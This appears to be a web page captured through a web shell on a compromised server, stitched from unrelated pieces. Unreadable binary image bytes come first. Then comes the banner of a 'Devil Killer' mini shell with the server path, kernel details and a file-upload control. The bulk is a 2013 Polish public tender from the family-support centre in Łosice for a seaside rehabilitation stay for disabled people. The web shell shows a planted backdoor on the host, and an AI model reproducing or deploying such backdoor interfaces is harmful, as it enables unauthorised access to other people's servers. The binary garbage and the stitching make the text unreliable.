JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130409/137412-N-2013.html

<p class="kh_header"><b>Łosice: Usługa zorganizowania turnusu rehabilitacyjnego dla 37 osób niepełnosprawnych - beneficjentów ostatecznych projektu oraz 5 opiekunów w ramach projektu Szansa Na Lepsze Jutro w Powiecie Łosickim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łosicach, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 137412 - 2013; data zamieszczenia: 09.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Łosicach , ul. Narutowicza 6, 08-200 Łosice, woj. mazowieckie, tel. 0-83 359 05 51, faks 0-83 359 08 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.losice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pcpr.losice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania turnusu rehabilitacyjnego dla 37 osób niepełnosprawnych - beneficjentów ostatecznych projektu oraz 5 opiekunów w ramach projektu Szansa Na Lepsze Jutro w Powiecie Łosickim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łosicach, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem zamówienia jest zorganizowanie 16-dniowego turnusu rehabilitacyjnego usprawniająco-rekreacyjnego /14 dni turnus + 2 dni dojazd/ nad morzem Bałtyckim /województwo zachodnio-pomorskie/, dla 37 osób niepełnosprawnych - beneficjentów ostatecznych projektu oraz 5 opiekunów w ramach projektu Szansa Na Lepsze Jutro w Powiecie Łosickim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Łosicach, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
3.2.Czas trwania usługi: 16 dni, /15 noclegów/.
3.3.Przedmiotowe zamówienie publiczne współfinansowane jest ze środków PFRONoraz środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki, Priorytet VII promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.
3.4.Wykonawca zobowiązany jest realizować turnus zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych /Dz.U. 2007r. Nr. 230, poz. 1694/.
3.5.Usługa opisana poniżej obejmuje: zakwaterowanie, wyżywienie, zorganizowanie uczestnikom czasu wolnego, rehabilitację oraz dojazd uczestników z Łosic do miejsca turnusu i z miejsca turnusu do Łosic.
3.6.Wykonawca będący organizatorem turnusu zapewni dla każdego uczestnika turnusu:
A)Realizację turnusu usprawniająco-rekreacyjnego dla osób niepełnosprawnych z następującymi dysfunkcjami:
-z chorobami narządów wydzielania wewnętrznego
-z chorobami neurologicznymi
-z chorobami układu moczowo-płciowego
-z chorobami układu pokarmowego
-z chorobą psychiczną
-z cukrzycą
-z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach inwalidzkich
-ze schorzeniami układu krążenia
-ze schorzeniami układu oddechowego
-z padaczką
-z upośledzeniem umysłowym
-z dysfunkcją narządu wzroku
-ze schorzeniami laryngologicznymi
-z zaburzeniami głosu, mowy i słuchu
-kobiety po mastektomii
-choroby skórne
B)Wypoczynek w obiekcie sanatoryjnym lub wypoczynkowym, przystosowanym do realizacji turnusów rehabilitacyjnych, zlokalizowany w województwie zachodnio-pomorskim, w obiekcie położonym max. do 300 m od plaży nadmorskiej z płaskim zejściem dostosowanym do osób niepełnosprawnych z dysfunkcją ruchu. /Zamawiający wyklucza położenie ośrodka przy plaży z zejściem klifowym/.
C)Badanie lekarskie na początku i na końcu turnusu.
D)Minimum 3 zabiegi dziennie /nie mniej niż 30 podczas całego turnusu/ dla każdego uczestnika wg. zaleceń lekarza, na podstawie informacji o stanie zdrowia wraz z dokumentacją medyczną. Każdy dodatkowy bezpłatny zabieg wskazany przez Wykonawcę będzie poddany dodatkowej punktacji w ocenie oferty.
E)Kadrę gwarantującą prawidłową organizację i realizację programu turnusu.
F)Łączny czas zorganizowanych zajęć indywidualnych i grupowych na turnusie w wymiarze nie mniejszym niż 7 godzin dziennie.
G)Opiekuna grupy odpowiedzialnego za koordynację pobytu grupy na turnusie.
H)Stałą opiekę pielęgniarską i korzystanie z opieki lekarskiej podczas turnusu.
I)Zakwaterowanie uczestników turnusu i ich opiekunów w obiekcie, który poza pełnym zapleczem gastronomicznych, sanitarnym i rekreacyjnym spełnia następujące warunki:
-Jest dostosowany do potrzeb osób niepełnosprawnych.
-Dysponuje pokojami 2- i 3- osobowymi dla uczestników turnusu z pełnym węzłem sanitarnym, wc, umywalką i natryskiem /z całodobowym dostępem do ciepłej i zimnej wody/ oraz wyposażonych w pojedyncze łóżka z pościelą /wyklucza się łóżka piętrowe/, szafy ubraniowe, krzesła, stolik, czajnik bezprzewodowy, TV-SAT, radio, lodówkę, talerzyki i sztućce, szklanki lub kubki oraz sprzęt plażowy: leżak, parawan. 
-Dysponuje na swoim terenie basenem krytym lub odkrytym z podgrzewaną wodą o wymiarach minimalnych 50 m2, z możliwością codziennego nieodpłatnego korzystania przez uczestników turnusu.
-Dysponuje na terenie ośrodka miejscem do zorganizowania ogniska, posiadające miejsce do siedzenia dla każdego uczestnika.
-Posiada odpowiednią bazę do prowadzenia rehabilitacji i realizacji programu turnusu, w tym gabinet lekarski i zabiegowy.
-Posiada sprzęt sportowo-rekreacyjny udostępniony dla uczestników turnusu bezpłatnie np. wypożyczalnia rowerów, boiska itp.
J)Uczestnicy turnusu powinni być zakwaterowani w pokojach blisko siebie w jednym budynku. W przypadku zakwaterowania na piętrze wymaga się aby w budynku była sprawna winda.
K)Całodzienne wyżywienie w postaci trzech posiłków: śniadanie, obiad i kolacja z zastrzeżeniem, iż w dniu przyjazdu i w dniu odjazdu oraz w dni wycieczek autokarowych Wykonawca zapewni uczestnikom turnusu suchy  prowiant /kanapki/ oraz napoje na czas podróży. Dodatkowo w dniu przyjazdu uczestników turnusu Wykonawca zapewni uczestnikom obiadokolację a w dniu wyjazdu - śniadanie.
3.7.Inne postanowienia:
A)Ubezpieczenie uczestników turnusu leży po stronie Zamawiającego.
B)Łączny czas trwania turnusu rehabilitacyjnego  to 14 dni. Dodatkowe 2 dni to czas dojazdu na turnus i powrotu z turnusu.
C)Ośrodek przyjmujący osoby niepełnosprawne na turnus rehabilitacyjny musi posiadać aktualny wpis do rejestru ośrodków, o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych /Dz.U. z dnia 11.12.2007r. Nr. 230, poz. 1694/.
D)Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym, w którym będą uczestniczyć osoby z dysfunkcjami lub schorzeniami określonymi w rozdziale III pkt. 3.5.A.
E)Organizator turnusu musi posiadać wpis do rejestru organizatorów turnusów rehabilitacyjnych, w których uczestniczą osoby niepełnosprawne korzystające z dofinansowania ze środków PFRON.
F)Wykonawca zapewni przejazd uczestników turnusu. Przejazd nastąpi z Łosic /parking przy Powiatowym Centrum Pomocy Rodzinie, ul. Narutowicza 6/ do miejsca realizacji turnusu. Powrót w dniu zakończenia turnusu z miejsca pobytu do Łosic /parking przy Powiatowym Centrum Pomocy Rodzinie,  ul. Narutowicza 6/ po wykwaterowaniu. Autokar, którym będą podróżować uczestnicy turnusu winien być sprawny technicznie, z klimatyzacją, posiadać ubezpieczenie OC, NNW oraz aktualne badania techniczne. Autokar winien być dostępny dla uczestników turnusu minimum 2 razy w ciągu trwania turnusu w celu odbycia wycieczki.
G)Wykonawca opłaci taksę klimatyczną za wszystkich uczestników turnusu i ich opiekunów, jeśli wymagać będzie tego lokalizacja ośrodka w miejscowości uzdrowiskowej.
H)Wykonawca zapewni uczestnikom program kulturalno-oświatowy w postaci: zwiedzania atrakcji turystycznych znajdujących się w pobliżu miejsca położenia ośrodka z uwzględnieniem rodzajów niepełnosprawności, zorganizowaniu co najmniej 2 całodziennych wycieczek autokarowych z przewodnikiem, zorganizowaniem 1 rejsu statkiem, 2 ognisk z pieczeniem kiełbasek, z pieczywem i napojami oraz 2 wieczorków tanecznych. /Koszty związane z opłatą przewodnika, zakupem biletów i całą organizacją wycieczek pokrywa Wykonawca/.
3.8.Wykonawca ponosi pełnią odpowiedzialność za właściwą realizację usług związanych z przebiegiem turnusu rehabilitacyjnego, w tym zabiegami rehabilitacyjnymi, opieką medyczną, imprezami integracyjnymi.
3.9.Zamawiający  zastrzega sobie również, iż do obowiązków Wykonawcy będzie należało:
A)Niezwłoczne zawiadomienie Zamawiającego o każdym przypadku przerwania turnusu rehabilitacyjnego przez jego uczestnika,
B)Przekazanie Zamawiającemu w ciągu 21 dni od zakończenia turnusu rehabilitacyjnego informacji o  przebiegu turnusu, o której mowa w art. 10c ust.7 pkt 4 ustawy z dnia 27 sierpnia 1997r o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych /Dz.U. z 2011r. Nr 127, poz. 721 z późn. zm./.
C)Wystawienie po zakończeniu turnusu rehabilitacyjnego jednej zbiorczej faktury dla wszystkich uczestników turnusu wraz z opiekunami, której płatnikiem będzie Zamawiający, obejmującej wysokość dofinansowania ze środków EFS.
D)Wystawienie po zakończeniu turnusu rehabilitacyjnego odrębnych faktur wystawionych oddzielnie dla każdego uczestnika turnusu w terminie 14 dni od zakończenia turnusu, których płatnikiem będzie Zamawiający, obejmujących wysokość dofinansowania ze środków PFRON /taki wymóg nakładają na Zamawiającego przepisy określone w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych /Dz.U. Nr 230, poz. 1694/.
E)W przypadku rezygnacji osoby niepełnosprawnej z uczestnictwa w turnusie przed jego rozpoczęciem lub stwierdzenia w wyniku kontroli rażących uchybień w zakresie realizacji turnusu Organizator zobowiązuje się do zwrotu 100% środków przekazanych przez PCPR Łosice w terminie 7 dni od czasu zakończenia tego turnusu na rachunek bankowy PCPR.
F)W czasie trwania turnusu rehabilitacyjnego oznakowania miejsc, z których korzystać będą uczestnicy turnusu poprzez umieszczenie plakatów informacyjnych dotyczących projektu, które otrzyma od Zamawiającego po podpisaniu umowy o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
G)Termin turnusu podany w SIWZ jest terminem założonym w harmonogramie realizacji projektu. Zamawiający zastrzega sobie zmianę terminu turnusu rehabilitacyjnego, o czym Wykonawca zostanie poinformowany z 10-cio dniowym wyprzedzeniem
3.10.Liczba uczestników i opiekunów może ulec zmianie i tak:
A)Jeżeli Zamawiający zgłosi zmniejszenie lub zwiększenie ilości uczestników turnusu o nie więcej niż 10% najpóźniej do 1-go dnia przed umownym terminem rozpoczęcia turnusu, to Zamawiający nie poniesie kosztów umownych świadczeń przewidzianych dla uczestników turnusu, których nieobecność została zgłoszona.
B)Jeżeli Zamawiający zgłosi zmniejszenie lub zwiększenie ilości uczestników turnusu o nie więcej niż 10% w dniu rozpoczęcia turnusu, to Zamawiający Zapłaci umowną cenę świadczeń przewidzianych dla uczestników turnusów, których nieobecność została zgłoszona przez Zamawiającego, za pierwszą dobę w ośrodku.
C)Jeżeli Zamawiający nie dokona zgłoszenia zmniejszenia  lub zwiększenia ilości uczestników turnusu, to Zamawiający zapłaci umowną cenę świadczeń przewidzianych dla uczestników turnusu , których nieobecność została zgłoszona przez Zleceniodawcę, za wszystkie dni trwania turnusu. 
3.11.Zamawiający nie dopuszcza możliwości złożenia oferty przewidującej odmienny niż określony w SIWZ sposób wykonania zamówienia /oferty wariantowej/.
3.12.Zamawiający nie dopuszcza złożenia oferty częściowej i nie przewiduje zamówień uzupełniających.
3.13.Ofertę należy złożyć na formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 92.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania tego warunku Wykonawca zobowiązany jest wykazać, że posiada łącznie:
-aktualny wpis do Rejestru ośrodków OD przyjmujących grupy turnusowe i rejestru organizatorów turnusów rehabilitacyjnych OR, o których mowa w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych /Dz.U. Nr 230, poz. 1694/,
Ocena spełniania tego warunku zostanie dokonana na podstawie dokumentów załączonych do oferty wymaganych w rozdz. VII SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert co najmniej 3 usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dla grupy min. 30 os. o wartości minimum 50 000,00 zł.
Ocena spełniania tego warunku zostanie dokonana na podstawie załącznika nr 4 Do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wykazanie, że Wykonawca dysponuje odpowiednimi warunkami techniczno-organizacyjnymi, dysponuje potencjałem technicznym niezbędnym do wykonania zabiegów rehabilitacyjnych oraz dysponuje kadrą zdolną do wykonania zamówienia, posiadającą wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę oświadczenia w ww. zakresie oraz dokumentów potwierdzających posiadanie odpowiedniego wykształcenia i doświadczenia osób biorących udział w wykonaniu zamówienia oraz złożenie przez Wykonawcę oświadczenia, że dysponuje odpowiednimi warunkami techniczno-organizacyjnymi, dysponuje potencjałem technicznym niezbędnym do wykonania zabiegów rehabilitacyjnych oraz dysponuje kadrą zdolną do wykonania zamówienia, posiadającą wymagane uprawnienia /zał. Nr 8 SIWZ/</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie wykazanie, że Wykonawca dysponuje odpowiednimi warunkami techniczno-organizacyjnymi, dysponuje potencjałem technicznym niezbędnym do wykonania zabiegów rehabilitacyjnych oraz dysponuje kadrą zdolną do wykonania zamówienia, posiadającą wymagane uprawnienia, jeśli ustawy nakładają obowiązek posiadania takich uprawnień.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego przez Wykonawcę oświadczenia w ww. zakresie oraz dokumentów potwierdzających posiadanie odpowiedniego wykształcenia i doświadczenia osób biorących udział w wykonaniu zamówienia oraz złożenie przez Wykonawcę oświadczenia, że dysponuje odpowiednimi warunkami techniczno-organizacyjnymi, dysponuje potencjałem technicznym niezbędnym do wykonania zabiegów rehabilitacyjnych oraz dysponuje kadrą zdolną do wykonania zamówienia, posiadającą wymagane uprawnienia /zał. Nr 8 SIWZ/</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem tego warunku będzie załączenie dokumentu lub potwierdzonej 
kserokopii o posiadaniu ubezpieczenia OC w zakresie prowadzonej działalności gospodarczej, obejmujące przedmiot zamówienia, na kwotę nie mniejszą niż 100 000,00 zł. oraz nie podlegają wykluczeniu na podstawie ustawy Prawo zamówień publicznych.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonej kserokopii poświadczonej za zgodność z oryginałem polisy ubezpieczeniowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

